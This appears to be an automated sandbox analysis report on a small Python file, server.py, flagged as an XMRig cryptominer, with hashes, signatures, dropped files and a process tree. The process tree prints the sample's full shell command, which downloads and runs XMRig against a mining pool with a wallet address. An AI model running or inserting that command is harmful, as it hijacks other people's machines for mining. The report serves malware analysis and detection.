Overview

overview

10

Static

static

1

server.py

ubuntu-20.04-amd64

10

Analysis

  • max time kernel
    2s
  • max time network
    139s
  • platform
    ubuntu-20.04_amd64
  • resource
    ubuntu2004-amd64-20240508-en
  • resource tags

    arch:amd64arch:i386image:ubuntu2004-amd64-20240508-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system
  • submitted
    17-05-2024 12:29

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    server.py

  • Size

    289B

  • MD5

    1f4e3ed211461ede09b67f89157dd46d

  • SHA1

    6f926a59430253e7b4b532fb7ce2036589daade6

  • SHA256

    09fcd446fbd31737cff906d62041cec86e92845331e4b64bab7ccbf9c2f14099

  • SHA512

    9dc3a66a25165363ecd9dbe14a72457612870a6121d9b3b5055e70063f3690d0c1d66f6994b1d50035536d47d105448aaa4c7e0e4e2e8c80c45d80b6c4f78929

Score
10/10
xmrig_linuxminer

Malware Config

Signatures

  • XMRig Miner payload 2 IoCs
    miner
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig_linux
  • Reads runtime system information 2 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 4 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /usr/bin/python
    python /tmp/server.py
    1⤵
      PID:1393
      • /bin/sh
        sh -c "wget https://github.com/xmrig/xmrig/releases/download/v6.14.1/xmrig-6.14.1-linux-x64.tar.gz && tar -zxvf xmrig-6.14.1-linux-x64.tar.gz && cd xmrig-6.14.1 && clear && ./xmrig -o rx.unmineable.com:3333 -a rx -k -u TRX:TSauN6zJYsJeGsEisA32FyfXtWbpLAdkG6.myminer -p x"
        2⤵
          PID:1397
          • /usr/bin/wget
            wget https://github.com/xmrig/xmrig/releases/download/v6.14.1/xmrig-6.14.1-linux-x64.tar.gz
            3⤵
            • Writes file to tmp directory
            PID:1398
          • /usr/bin/tar
            tar -zxvf xmrig-6.14.1-linux-x64.tar.gz
            3⤵
            • Reads runtime system information
            • Writes file to tmp directory
            PID:1435
            • /usr/local/sbin/gzip
              gzip -d
              4⤵
                PID:1436
              • /usr/local/bin/gzip
                gzip -d
                4⤵
                  PID:1436
                • /usr/sbin/gzip
                  gzip -d
                  4⤵
                    PID:1436
                  • /usr/bin/gzip
                    gzip -d
                    4⤵
                      PID:1436
                  • /usr/bin/clear
                    clear
                    3⤵
                      PID:1437

                Network

                MITRE ATT&CK Matrix

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • /root/.wget-hsts
                  Filesize

                  165B

                  MD5

                  b20fd390b8513a199828cf20d779ad7b

                  SHA1

                  588bc937127fb79740dafb5f761f758e054e0c8e

                  SHA256

                  ebe99b4caf5057f9456df60e0c5d455b563eacd4ad45030c4eb011d76a064233

                  SHA512

                  d644a70a72f3078891cdf4047ed0abb89a50fb8ed834ab5716a2cd4e646193a42360a808de37b5140712a3aabf7210bfbbbd46bba704c164a0629cfe1f9a70f0

                  Download Submit

                • /tmp/xmrig-6.14.1-linux-x64.tar.gz
                  Filesize

                  3.0MB

                  MD5

                  38cd0ce13f9ae9661c94caa4bc5414ff

                  SHA1

                  3a10414e2ee8f33ce5748a328c3fdca7c8332497

                  SHA256

                  3883e7fe051b2f17ccdf21a3494c977ca2f0d6d4d0899da95cfbee17fd0bee88

                  SHA512

                  7133ffa42223568a249e128267291d80e10d0d5911390791dacd889483051c7243bc8baa9073a364aff65bacf91916fe6032636dbea642d643fbed5fdc825583

                  Download Submit

                • /tmp/xmrig-6.14.1/SHA256SUMS
                  Filesize

                  150B

                  MD5

                  3f85f3cbef0ea798a67f8f3775712723

                  SHA1

                  f40829f56a4928aaffcc001124d279846b15995f

                  SHA256

                  aa95571fef1682cfff712b6c59e06e8d21cd97c10bddcc22187f8068a39be819

                  SHA512

                  118795457d699a1dc663a547b9be3799628d75fbd9237f96617f8193dad5ce2fbd0ba181ca8845245c9664d17b21affaa2e28cd603100952cfdca772354eb23a

                  Download Submit

                • /tmp/xmrig-6.14.1/config.json
                  Filesize

                  2KB

                  MD5

                  61def7b3b98458a40fffa42a19ddf258

                  SHA1

                  1b18a16b8e2950332b8f47f4af6de254fa2313aa

                  SHA256

                  2c923d8b553bde8ce3167fe83f35a40a712e2bed2b76ebaf5e3e63642d551389

                  SHA512

                  e2258bb277ff72fc4033979190aa55f87a8fdf8ae2e689456798e2789ce3f3a267d4ea5a4c6d27e8460c553ca7d34a319b79f87bf651d262aec6685aa155d1fc

                  Download Submit

                • /tmp/xmrig-6.14.1/xmrig
                  Filesize

                  7.6MB

                  MD5

                  0893ec5be269546137eec2682dfdfa8c

                  SHA1

                  842778a172420be8310236345b870c07ce120502

                  SHA256

                  428340a0695393a0cec55513e700a479e252d9b034f27f80a29da3ac99afa459

                  SHA512

                  2b0a6952ea1e2f28bcadb86ae4e79f0db532dcc1c956a57336f269587fd0d60b6d88947c65761a9bc87d4b0aacecec3b9bccc971b339c99fb57afd66713dd2ae

                  Download Submit